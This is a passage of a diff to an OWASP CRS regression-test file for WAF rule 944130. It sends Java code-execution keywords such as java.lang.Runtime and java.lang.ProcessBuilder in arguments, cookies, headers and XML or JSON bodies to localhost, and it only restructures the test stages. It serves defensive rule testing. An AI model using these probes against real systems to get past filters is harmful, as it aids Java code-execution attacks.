Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Process" - output: - log_contains: "id \"944130\"" - - test_title: 944130-318 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_id: 318 desc: "Content-Type application/json arg value includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Process\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-319 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Process\"}" + output: + log_contains: "id \"944130\"" + - test_id: 319 desc: "Content-Type application/json arg name includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Process\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-320 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Process\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 320 desc: "Argument test includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-321 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_id: 321 desc: "Argument name includes keyword 
java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.ProcessBuilder=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-322 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder=test" + output: + log_contains: "id \"944130\"" + - test_id: 322 desc: "Cookie test includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.ProcessBuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-323 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + Cookie: test=java.lang.ProcessBuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 323 desc: "Cookie name includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.ProcessBuilder=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-324 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.ProcessBuilder=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 324 desc: "Request header test includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.ProcessBuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-325 + - input: + dest_addr: "127.0.0.1" + 
port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.ProcessBuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 325 desc: "XML attribute value includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-326 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 326 desc: "XML element value includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-327 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_id: 327 desc: "Nested XML element value includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-328 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_id: 328 desc: "Content-Type text/plain includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-329 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_id: 329 desc: "Content-Type application/json arg value includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.ProcessBuilder\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-330 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.ProcessBuilder\"}" + output: + log_contains: "id \"944130\"" + - test_id: 330 desc: "Content-Type application/json arg name includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - 
User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.ProcessBuilder\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-331 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.ProcessBuilder\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 331 desc: "Argument test includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.reflect" - output: - log_contains: "id \"944130\"" - - test_title: 944130-332 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_id: 332 
desc: "Argument name includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.reflect=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-333 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.reflect=test" + output: + log_contains: "id \"944130\"" + - test_id: 333 desc: "Cookie test includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.reflect - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-334 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + Cookie: test=java.lang.reflect + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 334 desc: "Cookie name includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.reflect=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-335 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.reflect=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 335 desc: "Request header test includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.reflect - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-336 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.reflect + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 336 desc: "XML attribute value includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-337 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 337 desc: "XML element value includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.reflect" - output: - log_contains: "id \"944130\"" - - 
test_title: 944130-338 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_id: 338 desc: "Nested XML element value includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.reflect" - output: - log_contains: "id \"944130\"" - - test_title: 944130-339 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_id: 339 desc: "Content-Type text/plain includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - 
data: "test=java.lang.reflect" - output: - log_contains: "id \"944130\"" - - test_title: 944130-340 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_id: 340 desc: "Content-Type application/json arg value includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.reflect\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-341 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.reflect\"}" + output: + log_contains: "id \"944130\"" + - test_id: 341 desc: "Content-Type application/json arg name includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.reflect\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-342 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.reflect\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 342 desc: "Argument test includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - test_title: 944130-343 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_id: 343 desc: "Argument name includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: 
"OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Runtime=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-344 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Runtime=test" + output: + log_contains: "id \"944130\"" + - test_id: 344 desc: "Cookie test includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Runtime - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-345 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Runtime + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id 
